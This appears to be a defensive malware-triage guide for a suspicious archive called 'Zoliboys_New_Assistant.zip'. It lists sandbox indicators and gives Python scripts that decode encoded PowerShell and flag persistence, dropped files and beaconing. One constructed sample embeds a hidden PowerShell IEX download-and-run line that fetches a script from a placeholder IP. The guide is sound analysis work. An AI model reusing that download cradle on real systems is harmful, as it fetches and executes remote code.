Zoliboys_New_Assistant.zip

Do not extract this on your host machine. Use a dedicated sandbox environment (like FlareVM, Any.Run, or Triage).

Contents: the archive usually contains an executable (.exe), a shortcut file (.lnk), or a heavily obfuscated PowerShell script. The shortcut file inside often points to cmd.exe or powershell.exe, passing a long, base64-encoded string as an argument. When that argument follows -EncodedCommand (or its short forms -e / -enc), it is base64 of UTF-16LE text, so decode it as UTF-16LE rather than UTF-8.

If you are analyzing this in a sandbox, look for these specific markers:

4. Behavioral Findings

Persistence: check for new entries in the Windows Registry under HKCU\Software\Microsoft\Windows\CurrentVersion\Run.

Dropped files: look for hidden files in %AppData% or %LocalAppData% with randomized names (e.g., a1b2c3d4.exe).

Network: outbound connections to uncommon ports (e.g., 5555, 6666, or 8080) or attempts to reach known malicious domains associated with "Zoliboys" campaigns. Treat the port on its own as a weak signal, since 8080 (like 443) also carries legitimate traffic; what matters is which process opened the connection.

Static analysis: use tools like strings or PEStudio on the executable to find hardcoded C2 IP addresses.

If you find a PowerShell script, look for the Invoke-Expression (IEX) command; replacing it with Write-Output makes the script print the next stage instead of running it, which often reveals the true malicious code.
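The decode-then-defang workflow for the .lnk command line and the IEX tip above, as an added example written for this page rather than code from the original. It decodes the -EncodedCommand blob as UTF-16LE, peels one nested FromBase64String('...') layer, swaps Invoke-Expression/IEX for Write-Output so each layer is safe to read, and pulls URLs and IPv4 addresses the way you would grep `strings` output. The sample command line and the 203.0.113.10 address are constructed (a documentation range), not indicators from the real archive.

```python
"""Static triage of a .lnk -> powershell.exe command line: decode -EncodedCommand,
peel nested base64, defang IEX, and pull C2 indicators. Added example, not the page's code."""
import base64
import re
from typing import Dict, List, Optional

# -EncodedCommand and the short forms PowerShell accepts for it (-e, -ec, -enc), then the base64 blob.
ENC_SWITCH = re.compile(r"-(?:e|ec|enc|encodedcommand)\s+([A-Za-z0-9+/=]+)", re.IGNORECASE)
# A second stage is frequently wrapped as [Convert]::FromBase64String('...').
NESTED_B64 = re.compile(r"FromBase64String\(\s*['\"]([A-Za-z0-9+/=]+)['\"]\s*\)", re.IGNORECASE)
IEX = re.compile(r"\b(?:Invoke-Expression|IEX)\b", re.IGNORECASE)
URL = re.compile(r"https?://[^\s'\"<>)]+", re.IGNORECASE)
IPV4 = re.compile(r"\b(?:\d{1,3}\.){3}\d{1,3}(?::\d{1,5})?\b")


def decode_encoded_command(cmdline: str) -> Optional[str]:
    """Return the script behind -EncodedCommand, or None if the switch is absent.
    PowerShell defines the blob as base64 of UTF-16LE text, so UTF-8 decoding would give garbage."""
    m = ENC_SWITCH.search(cmdline)
    if m is None:
        return None
    return base64.b64decode(m.group(1)).decode("utf-16le")


def nested_payloads(script: str) -> List[str]:
    """Decode every FromBase64String('...') literal in the script (UTF-8 assumed for the inner blobs)."""
    out = []
    for m in NESTED_B64.finditer(script):
        try:
            out.append(base64.b64decode(m.group(1)).decode("utf-8", "replace"))
        except ValueError:  # binascii.Error is a ValueError: not valid base64, skip it
            continue
    return out


def neutralize_iex(script: str) -> str:
    """Swap Invoke-Expression / IEX for Write-Output so the next stage is printed, not executed."""
    return IEX.sub("Write-Output", script)


def extract_indicators(text: str) -> Dict[str, List[str]]:
    """Rough equivalent of grepping `strings` output for URLs and IPv4 addresses (optional :port)."""
    return {"urls": sorted(set(URL.findall(text))), "ipv4": sorted(set(IPV4.findall(text)))}


def triage_cmdline(cmdline: str) -> Dict[str, object]:
    """Full pipeline: decode, unwrap one nested layer, defang each layer, collect indicators."""
    script = decode_encoded_command(cmdline)
    if script is None:
        return {"encoded": False}
    layers = [script] + nested_payloads(script)
    return {
        "encoded": True,
        "layers": [neutralize_iex(s) for s in layers],  # safe to read; never run these
        "indicators": extract_indicators("\n".join(layers)),
    }


# Constructed sample, not taken from the real archive: the sort of argument string a malicious .lnk
# hands to powershell.exe. 203.0.113.10 is a documentation (TEST-NET-3) address.
_STAGE2 = "IEX (New-Object Net.WebClient).DownloadString('http://203.0.113.10:5555/a.ps1')"
_STAGE1 = ("$p=[Text.Encoding]::UTF8.GetString([Convert]::FromBase64String('"
           + base64.b64encode(_STAGE2.encode("utf-8")).decode() + "'));Invoke-Expression $p")
SAMPLE_CMDLINE = ("C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe -nop -w hidden -enc "
                  + base64.b64encode(_STAGE1.encode("utf-16le")).decode())

if __name__ == "__main__":
    import json
    print(json.dumps(triage_cmdline(SAMPLE_CMDLINE), indent=2))
```

Feed it the Arguments field you read out of the .lnk (any LNK parser will give you that string); the nested-layer decoder assumes UTF-8 inner blobs, which is the common case but not guaranteed, so check the bytes if the output looks wrong.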
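The behavioral markers listed for the sandbox run (Run-key persistence, randomly named executables under %AppData%/%LocalAppData%, and outbound connections) as an added detection example, not code from the original page. It runs over a constructed list of Sysmon-style events rather than live telemetry; the event schema, the random-name heuristic, and the 203.0.113.0/24 and 198.51.100.0/24 addresses (documentation ranges) are all assumptions made for the example. The port check is deliberately secondary: a connection from a process living in AppData is flagged whatever the port, while a watched port from elsewhere is only corroborating evidence.

```python
"""Behavioral triage of sandbox telemetry for the markers listed above: Run-key persistence,
randomly named executables under %AppData%/%LocalAppData%, and suspicious outbound connections.
Added example over constructed Sysmon-style events; not the page's code."""
import re
from typing import Dict, Iterable, List, Tuple

RUN_KEY = re.compile(r"^HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Run(?:Once)?\\", re.IGNORECASE)
# %AppData% and %LocalAppData% expand to C:\Users\<user>\AppData\Roaming and ...\AppData\Local.
APPDATA = re.compile(r"^[A-Z]:\\Users\\[^\\]+\\AppData\\(?:Roaming|Local)\\", re.IGNORECASE)
EXEC_EXT = {"exe", "dll", "ps1", "vbs", "js", "scr"}
# Ports the page calls out. 8080 (like 443) also carries plenty of legitimate traffic,
# so the port is only corroborating evidence; the process that opened the socket matters more.
WATCH_PORTS = {5555, 6666, 8080}


def looks_random(stem: str) -> bool:
    """Heuristic for dropper names like a1b2c3d4: 8+ alphanumerics mixing letters and digits."""
    return (len(stem) >= 8 and stem.isalnum()
            and any(c.isdigit() for c in stem) and any(c.isalpha() for c in stem))


def is_suspicious_drop(path: str) -> bool:
    """Executable-type file under AppData whose name looks generated rather than chosen."""
    if not APPDATA.match(path):
        return False
    base = path.rsplit("\\", 1)[-1]
    stem, _, ext = base.rpartition(".")
    return ext.lower() in EXEC_EXT and looks_random(stem)


def triage_events(events: Iterable[Dict[str, object]]) -> List[Tuple[str, str]]:
    """Return (category, description) findings, in event order."""
    findings: List[Tuple[str, str]] = []
    for ev in events:
        image = str(ev.get("image", ""))
        kind = ev["type"]
        if kind == "RegistryValueSet" and RUN_KEY.match(str(ev["target"])):
            findings.append(("persistence", f"{image} wrote Run value {ev['target']}"))
        elif kind == "FileCreate" and is_suspicious_drop(str(ev["target"])):
            findings.append(("dropped_file", f"{image} created {ev['target']}"))
        elif kind == "NetworkConnect":
            # Anything beaconing from AppData is worth a look; a watched port alone is weaker evidence.
            if APPDATA.match(image) or ev["dport"] in WATCH_PORTS:
                findings.append(("network", f"{image} -> {ev['dst']}:{ev['dport']}"))
    return findings


# Constructed events, not real telemetry. 203.0.113.0/24 and 198.51.100.0/24 are documentation ranges.
_DROP = "C:\\Users\\bob\\AppData\\Roaming\\a1b2c3d4.exe"
SAMPLE_EVENTS = [
    {"type": "FileCreate", "image": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe",
     "target": _DROP},
    {"type": "RegistryValueSet", "image": _DROP,
     "target": "HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\Updater"},
    {"type": "NetworkConnect", "image": _DROP, "dst": "203.0.113.10", "dport": 5555},
    {"type": "NetworkConnect", "image": "C:\\Program Files\\Google\\Chrome\\Application\\chrome.exe",
     "dst": "198.51.100.7", "dport": 443},
    {"type": "NetworkConnect", "image": "C:\\Program Files\\Vendor\\agent.exe",
     "dst": "198.51.100.8", "dport": 8080},
    {"type": "FileCreate", "image": "C:\\Windows\\explorer.exe",
     "target": "C:\\Users\\bob\\Documents\\notes.txt"},
    {"type": "RegistryValueSet", "image": "C:\\Windows\\explorer.exe",
     "target": "HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\Advanced\\Hidden"},
]

if __name__ == "__main__":
    for category, detail in triage_events(SAMPLE_EVENTS):
        print(f"[{category}] {detail}")
```

On a real run, build the event list from Sysmon event IDs 13 (registry value set), 11 (file create) and 3 (network connection), or from the process/file/network tabs of the sandbox report; the random-name heuristic will also catch some legitimate installer temp files, so read the findings rather than alerting on them blindly.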